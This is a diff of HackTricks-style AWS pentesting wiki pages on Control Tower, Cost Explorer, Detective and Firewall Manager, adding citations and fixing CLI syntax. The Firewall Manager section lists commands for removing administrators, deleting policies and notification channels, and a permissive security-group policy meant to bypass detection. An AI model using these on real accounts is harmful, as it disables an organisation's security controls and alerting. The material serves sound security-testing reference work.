-AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog.
+AWS Control Tower follows prescriptive best practices and provides configurable Account Factory templates and blueprints for standardizing account provisioning. It is built on or integrates with services such as AWS Organizations, AWS Service Catalog, AWS IAM Identity Center, AWS Config, and AWS CloudTrail.<sup>[[1]](#references)[[4]](#references)[[5]](#references)</sup>
 
-With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies.
+With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view provisioned accounts, enabled controls, and noncompliant resources, and it automates account provisioning and the application of controls and policies.<sup>[[1]](#references)</sup>
 
-In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs.
+In addition, AWS Control Tower provides controls (formerly called guardrails), including preventive, detective, and proactive controls, to govern resources and monitor compliance. Mandatory controls are always applied, while strongly recommended and elective controls can be changed.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives.
+Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives.<sup>[[1]](#references)</sup>
 
 ### Enumeration
 
-For enumerating controltower controls, you first need to **have enumerated the org**:
+For enumerating Control Tower controls, you first need to **have enumerated the organization**:
 
 {{#ref}}
 ../aws-organizations-enum.md
 {{#endref}}
 
+After identifying the target OU, `list-enabled-controls` lists controls enabled on that OU and the accounts it contains.<sup>[[3]](#references)</sup>
+
 ```bash
-# Get controls applied in an account
-aws controltower list-enabled-controls --target-identifier arn:aws:organizations::<acc_id>:ou/<ou-id>
+# List controls enabled on an OU and its accounts
+aws controltower list-enabled-controls --target-identifier arn:aws:organizations::<management-account-id>:ou/<root-id>/<ou-id>
 ```
 
 > [!WARNING]
-> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts
+> Account Factory Customization can use **CloudFormation templates** as custom account blueprints, and AWS Control Tower directs CloudFormation to create StackSets in managed accounts. Depending on the permissions and template contents, this capability can be relevant to privilege escalation or post-exploitation in those accounts.<sup>[[4]](#references)</sup>
 
 ### Post Exploitation & Persistence
 
@@ -39,8 +39,15 @@ aws controltower list-enabled-controls --target-identifier arn:aws:organizations
 ../../aws-post-exploitation/aws-control-tower-post-exploitation/README.md
 {{#endref}}
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [What Is AWS Control Tower?](https://docs.aws.amazon.com/controltower/latest/userguide/what-is-control-tower.html)
+- [2] [About controls in AWS Control Tower](https://docs.aws.amazon.com/controltower/latest/controlreference/controls.html)
+- [3] [list-enabled-controls — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/controltower/list-enabled-controls.html)
+- [4] [Customize accounts with Account Factory Customization (AFC) - AWS Control Tower](https://docs.aws.amazon.com/controltower/latest/userguide/af-customization-page.html)
+- [5] [Integrated services - AWS Control Tower](https://docs.aws.amazon.com/controltower/latest/userguide/integrated-services.html)
+
+{{#include ../../../../banners/hacktricks-training.md}}
 
 
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
@@ -1,19 +1,22 @@
 # AWS - Cost Explorer Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Cost Explorer and Anomaly detection
 
-This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\
-Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**.
+This allows you to check **how money is being spent across AWS services** and helps with **detecting anomalies**.<sup>[[1]](#references)[[2]](#references)</sup>\
+Moreover, you can configure anomaly detection so AWS warns you when an **anomaly in costs is found**.<sup>[[2]](#references)</sup>
 
 ### Budgets
 
-Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\
-Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
+Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.<sup>[[3]](#references)</sup>\
+They can also monitor service usage rather than currency, such as selected storage or data-transfer usage types.<sup>[[3]](#references)[[4]](#references)</sup>
+
+## References
+
+- [1] [Analyzing your costs and usage with AWS Cost Explorer](https://docs.aws.amazon.com/cost-management/latest/userguide/ce-what-is.html)
+- [2] [Detecting unusual spend with AWS Cost Anomaly Detection](https://docs.aws.amazon.com/cost-management/latest/userguide/manage-ad.html)
+- [3] [Managing your costs with AWS Budgets](https://docs.aws.amazon.com/cost-management/latest/userguide/budgets-managing-costs.html)
+- [4] [Creating a usage budget](https://docs.aws.amazon.com/cost-management/latest/userguide/create-usage-budget.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
@@ -1,20 +1,18 @@
 # AWS - Detective Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Detective
 
-**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations.
+**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations.<sup>[[1]](#references)[[3]](#references)</sup>
 
-The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause.
+The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ## References
 
-- [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/)
-- [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective)
+- [1] [Amazon Detective](https://aws.amazon.com/detective/)
+- [2] [Vulnerability Related - CloudSecDocs](https://cloudsecdocs.com/aws/services/security/vuln/)
+- [3] [Amazon Detective features - AWS](https://aws.amazon.com/detective/features/)
+- [4] [What is Amazon Detective? - AWS](https://docs.aws.amazon.com/detective/latest/userguide/what-is-detective.html)
+- [5] [Amazon Detective - CloudSecDocs](https://cloudsecdocs.com/aws/services/logging/other/#detective)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
@@ -1,40 +1,38 @@
 # AWS - Firewall Manager Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Firewall Manager
 
-**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones.
+**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones.<sup>[[1]](#references)[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
-The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account.
+The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account.<sup>[[5]](#references)[[22]](#references)</sup>
 
-A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers.
+A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers.<sup>[[3]](#references)[[5]](#references)</sup>
 
-AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists:
+AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists.<sup>[[10]](#references)</sup>
 
-- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version.
+- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Public-Access-Apps-Denied**, and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them; however, you can choose their version.
 - **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required.
 
-It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option.
+AWS WAF Classic reached end of support on September 30, 2025. The old Firewall Manager policy-level behavior allowed either the rule group's configured action or **Count**, without a separate policy-level **Allow** option; do not treat that legacy behavior as current AWS WAF guidance.<sup>[[17]](#references)[[30]](#references)</sup>
 
 ### Prerequisites
 
-The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment:
+The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment.<sup>[[6]](#references)</sup>
 
-1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization.
-2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts.
-3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management.
-4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors.
-5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security.
-6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates.
+1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implemented. This allows for centralized management of resources and policies across multiple AWS accounts within the organization.<sup>[[7]](#references)</sup>
+2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Only the organization's management account can create Firewall Manager default administrator accounts.<sup>[[8]](#references)</sup>
+3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, and monitor resource configurations and changes; it must continuously record configuration changes for protected resources.<sup>[[9]](#references)</sup>
+4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors.<sup>[[6]](#references)</sup>
+5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security.<sup>[[6]](#references)[[23]](#references)</sup>
+6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates.<sup>[[6]](#references)[[13]](#references)</sup>
 
-For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
+For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).<sup>[[14]](#references)</sup>
 
 ### Types of protection policies
 
-AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure:
+AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure.<sup>[[5]](#references)</sup>
 
-1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets.
+1. **AWS WAF Policy:** You can define which resources are protected by the policy, specify sets of rule groups to run first and last in the web ACL, and allow account owners to add rules and rule groups between those sets.
 2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats.
 3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access.
 4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment.
@@ -46,17 +44,17 @@ AWS Firewall Manager manages several types of policies to enforce security contr
 
 ### Administrator accounts
 
-AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts.
+AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts.<sup>[[11]](#references)</sup>
 
-**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include:
+**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include the following.<sup>[[11]](#references)</sup>
 
-- Accounts or organizational units (OUs) that the administrator can apply policies to.
-- Regions where the administrator can perform actions.
-- Firewall Manager policy types that the administrator can manage.
+- Accounts or organizational units (OUs) that the administrator can apply policies to
+- Regions where the administrator can perform actions
+- Firewall Manager policy types that the administrator can manage
 
-Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege.
+Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege.<sup>[[11]](#references)</sup>
 
-There are two distinct types of administrator accounts, each serving specific roles and responsibilities:
+There are two distinct types of administrator accounts, each serving specific roles and responsibilities.<sup>[[8]](#references)[[11]](#references)</sup>
 
 - **Default Administrator:**
   - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager.
@@ -68,15 +66,19 @@ There are two distinct types of administrator accounts, each serving specific ro
   - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards.
   - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager.
 
-Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources.
+Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources.<sup>[[11]](#references)</sup>
 
-It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed:
+It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed.<sup>[[12]](#references)</sup>
 
-- First, each Firewall Administrator administrator account must revoke their own account.
+- First, each Firewall Manager administrator account must revoke their own account.
 - Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account.
-- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator.
+- To conclude, the AWS Organizations management account must designate the Firewall Manager default administrator.
 
 ## Enumeration
+
+The commands below correspond to the AWS CLI Firewall Manager operations and their IAM actions. The access notes reflect the current AWS managed `ReadOnlyAccess` permissions; several administrative and resource-set operations require additional permissions.<sup>[[2]](#references)[[15]](#references)[[25]](#references)</sup>
+
+For resource discovery, use `list-discovered-resources` with the member-account and resource-type parameters; `list-compliance-status` is reserved for policy compliance summaries.<sup>[[2]](#references)[[24]](#references)</sup>
 
 ```
 # Users/Administrators
@@ -96,7 +98,7 @@ aws fms list-admins-managing-account # ReadOnlyAccess policy is not enough for t
 # Resources
 
 ## Get the resources that a Firewall Manager administrator can manage
-aws fms get-admin-scope --admin-account <value> # ReadOnlyAccess policy is not enough for this
+aws fms get-admin-scope --admin-account <value>
 
 ## Returns the summary of the resource sets used
 aws fms list-resource-sets # ReadOnlyAccess policy is not enough for this
@@ -108,7 +110,7 @@ aws fms get-resource-set --identifier <value>  # ReadOnlyAccess policy is not en
 aws fms list-tags-for-resource --resource-arn <value>
 
 ## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request.
-aws fms list-compliance-status --member-account-ids <value> --resource-type <value> # ReadOnlyAccess policy is not enough for this
+aws fms list-discovered-resources --member-account-ids <value> --resource-type <value> # ReadOnlyAccess policy is not enough for this
 
 ## List the resources that are currently associated to a resource set
 aws fms list-resource-set-resources --identifier <value> # ReadOnlyAccess policy is not enough for this
@@ -127,7 +129,7 @@ aws fms list-third-party-firewall-firewall-policies --third-party-firewall <PALO
 # AppsList
 
 ## Return a list of apps list
-aws fms list-apps-lists --max-results [1-100]
+aws fms list-apps-lists --max-results <1-100>
 
 ## Get information about the specified AWS Firewall Manager applications list
 aws fms get-apps-list --list-id <value>
@@ -165,13 +167,15 @@ aws fms get-violation-details --policy-id <value> --member-account <value> --res
 
 ## Post Exploitation / Bypass Detection
 
+The AWS CLI invocations below use the corresponding current Firewall Manager operation names and option forms.<sup>[[15]](#references)</sup>
+
 ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`)
 
-An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association.
+An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or update a Firewall Manager administrator account, and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association.<sup>[[2]](#references)[[16]](#references)</sup>
 
-- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account.
-- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**.
-- The creation of a Firewall Manager administrator account can only be done by the organization's management account.
+- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account.<sup>[[12]](#references)</sup>
+- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**.<sup>[[16]](#references)</sup>
+- The creation of a Firewall Manager administrator account can only be done by the organization's management account.<sup>[[16]](#references)</sup>
 
 ```bash
 aws fms associate-admin-account --admin-account <value>
@@ -183,22 +187,26 @@ aws fms put-admin-account --admin-account <value>
 
 ### `fms:PutPolicy`, `fms:DeletePolicy`
 
-An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy.
+An attacker with the **`fms:PutPolicy`** and **`fms:DeletePolicy`** permissions would be able to create, modify, or permanently delete an AWS Firewall Manager policy.<sup>[[2]](#references)</sup>
+
+The following CLI forms use the documented `put-policy` and `delete-policy` options.<sup>[[27]](#references)[[28]](#references)</sup>
 
 ```bash
-aws fms put-policy --policy <value> | --cli-input-json file://<policy.json> [--tag-list <value>]
-aws fms delete-policy --policy-id <value> [--delete-all-policy-resources | --no-delete-all-policy-resources]
+aws fms put-policy --policy <value> [--tag-list <value>]
+aws fms put-policy --cli-input-json file://policy.json
+aws fms delete-policy --policy-id <value> --delete-all-policy-resources
+aws fms delete-policy --policy-id <value> --no-delete-all-policy-resources
 ```
 
-An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one:
+An example of a permissive policy through a permissive security group, in order to bypass detection, could be the following one. The request uses the `SECURITY_GROUPS_COMMON` policy shape and fields documented by AWS.<sup>[[17]](#references)[[18]](#references)[[29]](#references)</sup>
 
 ```json
 {
   "Policy": {
-    "PolicyName": "permisive_policy",
+    "PolicyName": "permissive_policy",
     "SecurityServicePolicyData": {
       "Type": "SECURITY_GROUPS_COMMON",
-      "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"<permisive_security_group_id>\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
+      "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"<permissive_security_group_id>\"}],\"applyToAllEC2InstanceENIs\":true,\"includeSharedVPC\":true}"
     },
     "ResourceTypeList": [
       "AWS::EC2::Instance",
@@ -220,7 +228,7 @@ An example of permisive policy through permisive security group, in order to byp
 
 ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet`
 
-An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager.
+An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify, or delete these resource sets from AWS Firewall Manager.<sup>[[2]](#references)</sup>
 
 ```bash
 # Associate/Disassociate resources from a resource set
@@ -236,7 +244,7 @@ aws fms delete-resource-set --identifier <value>
 
 ### `fms:PutAppsList`, `fms:DeleteAppsList`
 
-An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS.
+An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify, or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS.<sup>[[2]](#references)</sup>
 
 ```bash
 aws fms put-apps-list --apps-list <value> [--tag-list <value>]
@@ -247,10 +255,12 @@ aws fms delete-apps-list --list-id <value>
 
 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList`
 
-An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS.
+An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify, or delete protocol lists from AWS Firewall Manager. Similarly to application lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS.<sup>[[2]](#references)</sup>
+
+The AWS CLI option for creating a protocol list is `--protocols-list`.<sup>[[26]](#references)</sup>
 
 ```bash
-aws fms put-protocols-list --apps-list <value> [--tag-list <value>]
+aws fms put-protocols-list --protocols-list <value> [--tag-list <value>]
 aws fms delete-protocols-list --list-id <value>
 ```
 
@@ -258,9 +268,9 @@ aws fms delete-protocols-list --list-id <value>
 
 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel`
 
-An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs.
+An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs.<sup>[[2]](#references)[[20]](#references)[[21]](#references)</sup>
 
-To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role.
+To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role.<sup>[[19]](#references)[[20]](#references)</sup>
 
 For information about configuring an SNS access policy:
 
@@ -275,23 +285,23 @@ aws fms delete-notification-channel
 
 **Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment.
 
-### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall`
+### `fms:AssociateThirdPartyFirewall`, `fms:DisassociateThirdPartyFirewall`
 
-An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager.
+An attacker with the **`fms:AssociateThirdPartyFirewall`** and **`fms:DisassociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager.<sup>[[2]](#references)</sup>
 
 > [!WARNING]
-> Only the default administrator can create and manage third-party firewalls.
+> Only the default administrator can create and manage third-party firewalls.<sup>[[13]](#references)</sup>
 
 ```bash
-aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
-aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
+aws fms associate-third-party-firewall --third-party-firewall <PALO_ALTO_NETWORKS_CLOUD_NGFW|FORTIGATE_CLOUD_NATIVE_FIREWALL>
+aws fms disassociate-third-party-firewall --third-party-firewall <PALO_ALTO_NETWORKS_CLOUD_NGFW|FORTIGATE_CLOUD_NATIVE_FIREWALL>
 ```
 
 **Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation.
